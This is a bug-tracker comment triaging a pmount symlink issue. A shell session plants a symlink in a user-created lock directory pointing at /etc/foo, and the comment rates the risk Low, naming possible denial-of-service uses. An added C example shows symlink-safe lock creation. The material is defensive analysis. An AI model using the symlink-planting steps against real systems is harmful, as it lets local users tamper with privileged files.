Comment 1 for bug 574809

Jamie Strandboge (jdstrand) wrote :

Dan, I can confirm this, but I don't see that pmount is altering the contents of the file if it already exists. E.g.:
$ cat /etc/foo
test
$ stat /etc/foo
  File: `/etc/foo'
  Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000

$ mkdir /var/lock/pmount_dev_sr0
$ ls -ld /var/lock/pmount_dev_sr0/
drwxr-xr-x 2 jamie jamie 40 2010-06-05 12:12 /var/lock/pmount_dev_sr0/

$ ln -s /etc/foo /var/lock/pmount_dev_sr0/1
$ ls -l /var/lock/pmount_dev_sr0/1
lrwxrwxrwx 1 jamie jamie 8 2010-06-05 12:13 /var/lock/pmount_dev_sr0/1 -> /etc/foo

$ pmount --lock /dev/sr0 1

$ cat /etc/foo
test
$ stat /etc/foo
  File: `/etc/foo'
  Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000

I think I would characterize this as a 'Low' issue. A local attacker in the 'plugdev' group on Ubuntu could create things like /forcefsck or maybe fiddle with files in /var to DoS applications (e.g., sockets, named pipes, etc.).
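
The session above shows a user-owned lock directory with a symlink planted as the lock entry. As an added example (not part of the original comment and not pmount's code), here is one way a privileged helper can create a lock entry without following such a link. The names create_lock and demo are hypothetical, and the temp-directory scenario is constructed.

```c
/* Added illustration, not pmount's code; all names here are hypothetical. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* Create lock entry `name` in `dir`; returns an fd, or -1 with errno set.
 * `dir` must be a real directory owned by `owner` that others cannot write. */
int create_lock(const char *dir, const char *name, uid_t owner)
{
    struct stat st;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0) return -1;
    if (fstat(dfd, &st) < 0 || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(dfd);
        errno = EPERM;
        return -1;
    }
    /* O_EXCL fails with EEXIST on any existing name, dangling symlinks
     * included, so nothing is ever created at a link's target. */
    int fd = openat(dfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    int saved = errno;
    close(dfd);
    errno = saved;
    return fd;
}
/* Constructed scenario in a private temp dir; plant_link adds a dangling
 * symlink "1" first. Returns 1 = lock created, 0 = refused, -1 = the link
 * target got created or setup failed. */
int demo(int plant_link)
{
    char dir[] = "/tmp/lockdemoXXXXXX", target[64], entry[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(entry, sizeof entry, "%s/1", dir);
    if (plant_link && symlink(target, entry) < 0)
        return -1;
    int fd = create_lock(dir, "1", getuid());
    int target_made = (access(target, F_OK) == 0);
    if (fd >= 0) close(fd);
    unlink(entry); unlink(target); rmdir(dir);
    return target_made ? -1 : (fd >= 0);
}

int main(void) { printf("%d %d\n", demo(0), demo(1)); return 0; }
```

The ownership check on the directory covers the first step of the session, where the lock directory itself was created by the unprivileged user.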